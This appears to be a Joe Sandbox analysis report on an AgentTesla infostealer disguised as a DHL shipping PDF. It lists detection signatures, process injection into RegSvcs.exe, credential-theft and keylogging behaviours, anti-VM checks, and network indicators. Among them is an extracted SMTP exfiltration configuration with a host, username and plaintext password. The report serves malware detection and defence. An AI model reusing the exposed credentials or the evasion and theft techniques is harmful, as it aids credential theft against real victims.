Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWB DHL#40882993049403.pdf.exe

Overview

General Information

Sample name:AWB DHL#40882993049403.pdf.exe
Analysis ID:1466213
MD5:e31da8df37174250f302c4640f97ba15
SHA1:8fad39b3196f439d96fb662161c868de0dc36b9c
SHA256:92dc348193523762bc873e593467abfb04b3509f650976608e6c89436eea993f
Tags:DHLexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AWB DHL#40882993049403.pdf.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe" MD5: E31DA8DF37174250F302C4640F97BA15)
    • RegSvcs.exe (PID: 5660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elektronikkutu.com", "Username": "info@elektronikkutu.com", "Password": "9U:e3@wpS3:U7h_V"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.4515977938.000000000317E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 8 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x32395:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x32407:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x32491:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x32523:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x3258d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x325ff:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32695:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x32725:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      Click to see the 13 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Suspicious Double Extension File Execution
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe", CommandLine: "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, NewProcessName: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, OriginalFileName: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe", ProcessId: 1984, ProcessName: AWB DHL#40882993049403.pdf.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 94.73.188.44, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5660, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710

                      Snort Signatures

                      Timestamp:07/02/24-17:32:05.987984
                      SID:2030171
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-17:32:05.987984
                      SID:2839723
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-17:32:05.988045
                      SID:2851779
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-17:32:05.988045
                      SID:2840032
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-17:32:05.988045
                      SID:2855542
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-17:32:05.988045
                      SID:2855245
                      Source Port:49710
                      Destination Port:587
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elektronikkutu.com", "Username": "info@elektronikkutu.com", "Password": "9U:e3@wpS3:U7h_V"}
                      Multi AV Scanner detection for submitted file
                      Source: AWB DHL#40882993049403.pdf.exeReversingLabs: Detection: 21%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: AWB DHL#40882993049403.pdf.exeJoe Sandbox ML: detected
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: JJHI.pdbSHA256 source: AWB DHL#40882993049403.pdf.exe
                      Source: Binary string: JJHI.pdb source: AWB DHL#40882993049403.pdf.exe

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49710 -> 94.73.188.44:587
                      Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49710 -> 94.73.188.44:587
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49710 -> 94.73.188.44:587
                      Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49710 -> 94.73.188.44:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49710 -> 94.73.188.44:587
                      Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49710 -> 94.73.188.44:587
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.5:49710 -> 94.73.188.44:587
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewIP Address: 94.73.188.44 94.73.188.44
                      Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                      Source: Joe Sandbox ViewASN Name: CIZGITR CIZGITR
                      Source: unknownDNS query: name: ip-api.com
                      Source: global trafficTCP traffic: 192.168.2.5:49710 -> 94.73.188.44:587
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: mail.elektronikkutu.com
                      Source: AWB DHL#40882993049403.pdf.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: AWB DHL#40882993049403.pdf.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4514810650.0000000001547000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: RegSvcs.exe, 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.elektronikkutu.com
                      Source: RegSvcs.exe, 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mx-out05.natrohost.com
                      Source: AWB DHL#40882993049403.pdf.exeString found in binary or memory: http://ocsp.comodoca.com0
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087276155.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: AWB DHL#40882993049403.pdf.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, xljC6U.cs.Net Code: Qaz
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, xljC6U.cs.Net Code: Qaz
                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      .NET source code contains very large array initializations
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.64c0000.5.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
                      .NET source code contains very large strings
                      Source: AWB DHL#40882993049403.pdf.exe, frm_login.csLong String: Length: 97210
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: AWB DHL#40882993049403.pdf.exe
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_02D3D5BC0_2_02D3D5BC
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_053E6C000_2_053E6C00
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_053E00060_2_053E0006
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_053E00400_2_053E0040
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_053E6BF00_2_053E6BF0
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A225380_2_05A22538
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A225480_2_05A22548
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A267280_2_05A26728
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A2D7100_2_05A2D710
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A267180_2_05A26718
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A226DB0_2_05A226DB
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A2F6280_2_05A2F628
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A261680_2_05A26168
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A261780_2_05A26178
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A2DF800_2_05A2DF80
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A26F880_2_05A26F88
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A26F780_2_05A26F78
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A209E80_2_05A209E8
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A209F80_2_05A209F8
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A2DB480_2_05A2DB48
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeCode function: 0_2_05A2FA600_2_05A2FA60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F34AC83_2_02F34AC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F33EB03_2_02F33EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F3ECE13_2_02F3ECE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F3AD113_2_02F3AD11
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02F341F83_2_02F341F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A40CF83_2_06A40CF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A42CDE3_2_06A42CDE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A41FE33_2_06A41FE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A41FE83_2_06A41FE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A566303_2_06A56630
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A5B2783_2_06A5B278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A530A03_2_06A530A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A5C1C83_2_06A5C1C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A551D83_2_06A551D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A57DC03_2_06A57DC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A576E03_2_06A576E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A5E3E83_2_06A5E3E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A500403_2_06A50040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A5591F3_2_06A5591F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A500383_2_06A50038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06A500073_2_06A50007
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: invalid certificate
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087276155.0000000002F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedafe0966-c26d-4e7d-b1a5-d41abe896bab.exe4 vs AWB DHL#40882993049403.pdf.exe
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2085769454.000000000104E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs AWB DHL#40882993049403.pdf.exe
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2090251488.00000000064C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs AWB DHL#40882993049403.pdf.exe
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2090623875.0000000008560000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs AWB DHL#40882993049403.pdf.exe
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000000.2054967991.0000000000A62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJJHI.exe* vs AWB DHL#40882993049403.pdf.exe
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedafe0966-c26d-4e7d-b1a5-d41abe896bab.exe4 vs AWB DHL#40882993049403.pdf.exe
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs AWB DHL#40882993049403.pdf.exe
                      Source: AWB DHL#40882993049403.pdf.exeBinary or memory string: OriginalFilenameJJHI.exe* vs AWB DHL#40882993049403.pdf.exe
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, 9O2OLI.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, hdYUG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, LGBZ4N2f.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, F8OmG.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, Bgo.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, k7FmsUgnvL.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, qO4Z9xt0en1avIDhdN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, PaFAxtkSXK2Z0KMn6S.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.4143c48.2.raw.unpack, qO4Z9xt0en1avIDhdN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.AWB DHL#40882993049403.pdf.exe.8560000.7.raw.unpack, PaFAxtkSXK2Z0KMn6S.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AWB DHL#40882993049403.pdf.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                      Source: AWB DHL#40882993049403.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: AWB DHL#40882993049403.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: AWB DHL#40882993049403.pdf.exe, 00000000.00000000.2054967991.0000000000A62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO tab_grade (gId, gName) VALUES(NULL, @gName);SELECT @@IDENTITY# Add successfullyInfo%Add unsuccessfully-Grade name not changed
                      Source: AWB DHL#40882993049403.pdf.exeReversingLabs: Detection: 21%
                      Source: unknownProcess created: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe "C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe"
                      Source: C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
